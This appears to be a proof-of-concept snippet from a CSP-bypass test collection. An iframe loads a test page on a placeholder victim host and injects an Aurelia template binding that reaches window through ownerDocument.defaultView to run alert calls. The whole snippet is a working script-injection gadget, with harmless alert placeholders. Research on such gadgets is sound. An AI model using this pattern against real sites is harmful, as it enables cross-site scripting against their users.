<iframe src="https://victim.example.com/repo/csp/sd/aurelia.php?csp=wh&inj=<?php 
$payload = <<<'PAYLOAD'
<div ref=me 
s.bind="$this.me.ownerDocument.defaultView.alert(1)" 
>${$this.me.ownerDocument.defaultView.alert(2)}</div>
PAYLOAD;
echo urlencode($payload);
?>"></iframe>

